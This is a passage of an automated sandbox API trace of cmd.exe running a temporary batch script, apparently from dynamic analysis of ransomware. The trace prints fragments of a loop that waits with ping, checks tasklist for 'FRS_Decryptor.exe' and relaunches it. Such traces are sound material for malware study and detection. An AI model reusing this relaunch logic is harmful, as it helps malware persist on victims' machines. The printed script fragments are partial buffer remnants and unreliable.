_String2="DPATH") returned 12 [0073.220] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0073.220] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0073.220] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0073.220] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0073.220] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0073.220] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0073.220] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0073.220] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0073.220] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0073.221] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0073.221] SetErrorMode (uMode=0x0) returned 0x0 [0073.221] SetErrorMode (uMode=0x1) returned 0x0 [0073.221] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0073.221] SetErrorMode (uMode=0x0) returned 0x1 [0073.221] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0073.221] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0073.221] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0073.221] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.221] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0073.221] GetLastError () returned 0x2 [0073.221] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0073.221] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0073.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0073.221] GetLastError () returned 0x2 [0073.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0073.221] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0073.222] GetFileType (hFile=0x28) returned 0x2 [0073.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0073.222] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8efb4 | out: lpMode=0xc8efb4) returned 1 [0073.222] _dup (_FileHandle=1) returned 3 [0073.222] _close (_FileHandle=1) returned 0 [0073.222] _wcsicmp (_String1="nul", _String2="con") returned 11 [0073.222] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0073.222] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0073.222] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0073.223] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0073.223] SetErrorMode (uMode=0x0) returned 0x0 [0073.223] SetErrorMode (uMode=0x1) returned 0x0 [0073.223] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0073.223] SetErrorMode (uMode=0x0) returned 0x1 [0073.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0073.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0073.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0073.223] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.223] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0073.224] GetLastError () returned 0x2 [0073.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a0b0 [0073.224] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0073.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0073.224] GetLastError () returned 0x2 [0073.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0073.224] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0073.224] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0073.224] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0073.224] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0073.224] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0073.224] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0073.224] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0073.224] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0073.224] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0073.224] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0073.225] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0073.225] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0073.225] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x260, hThread=0x2a0, dwProcessId=0x7f4, dwThreadId=0x71c)) returned 1 [0073.228] CloseHandle (hObject=0x2a0) returned 1 [0073.228] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0073.228] GetEnvironmentStringsW () returned 0xd30508* [0073.228] FreeEnvironmentStringsA (penv="=") returned 1 [0073.228] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0075.306] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0075.306] CloseHandle (hObject=0x260) returned 1 [0075.306] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0075.306] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0075.306] GetEnvironmentStringsW () returned 0xd2c668* [0075.307] FreeEnvironmentStringsA (penv="=") returned 1 [0075.307] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0075.307] GetEnvironmentStringsW () returned 0xd30508* [0075.307] FreeEnvironmentStringsA (penv="=") returned 1 [0075.307] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0075.307] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0075.307] _close (_FileHandle=3) returned 0 [0075.307] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.307] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0075.308] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.308] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0075.308] _get_osfhandle (_FileHandle=0) returned 0x24 [0075.308] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0075.308] SetConsoleInputExeNameW () returned 0x1 [0075.308] GetConsoleOutputCP () returned 0x1b5 [0075.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0075.308] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.308] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0075.308] _open_osfhandle (_OSFileHandle=0x254, _Flags=8) returned 3 [0075.309] _get_osfhandle (_FileHandle=3) returned 0x254 [0075.309] SetFilePointer (in: hFile=0x254, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0075.309] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0075.309] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0075.309] SetFilePointer (in: hFile=0x254, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0075.309] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0075.309] GetFileType (hFile=0x254) returned 0x1 [0075.309] _get_osfhandle (_FileHandle=3) returned 0x254 [0075.309] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0075.309] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0075.309] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0075.309] SetFilePointer (in: hFile=0x254, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0075.309] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0075.309] GetFileType (hFile=0x254) returned 0x1 [0075.309] _get_osfhandle (_FileHandle=3) returned 0x254 [0075.309] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0075.309] _tell (_FileHandle=3) returned 2627 [0075.309] _close (_FileHandle=3) returned 0 [0075.310] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0075.310] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0075.310] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0075.310] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0075.310] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0075.315] feof (_File=0x76ea4c68) returned 0 [0075.315] ferror (_File=0x76ea4c68) returned 0 [0075.315] fgets (in: _Buf=0xd823d0, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0075.856] feof (_File=0x76ea4c68) returned 0 [0075.856] ferror (_File=0x76ea4c68) returned 0 [0075.856] fgets (in: _Buf=0xd8639e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0075.898] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0075.898] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43e06, cbMultiByte=78, lpWideCharStr=0xd43db8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0075.899] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0075.899] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0075.899] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x34c [0075.899] _open_osfhandle (_OSFileHandle=0x34c, _Flags=8) returned 3 [0075.899] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.899] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0075.899] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.899] GetFileSize (in: hFile=0x34c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0075.899] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0075.899] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.899] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0075.899] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.899] GetFileType (hFile=0x34c) returned 0x1 [0075.899] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0075.899] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0075.899] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0075.900] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0075.900] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.900] GetFileType (hFile=0x34c) returned 0x1 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0075.900] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0075.900] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0075.900] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.900] GetFileType (hFile=0x34c) returned 0x1 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0075.900] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0075.900] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.900] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.900] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.900] GetFileType (hFile=0x34c) returned 0x1 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.900] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0075.900] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0075.900] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.900] GetFileType (hFile=0x34c) returned 0x1 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0075.900] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0075.900] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0075.900] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0075.900] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.900] GetFileType (hFile=0x34c) returned 0x1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0075.901] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0075.901] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0075.901] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.901] GetFileType (hFile=0x34c) returned 0x1 [0075.901] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0075.901] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, 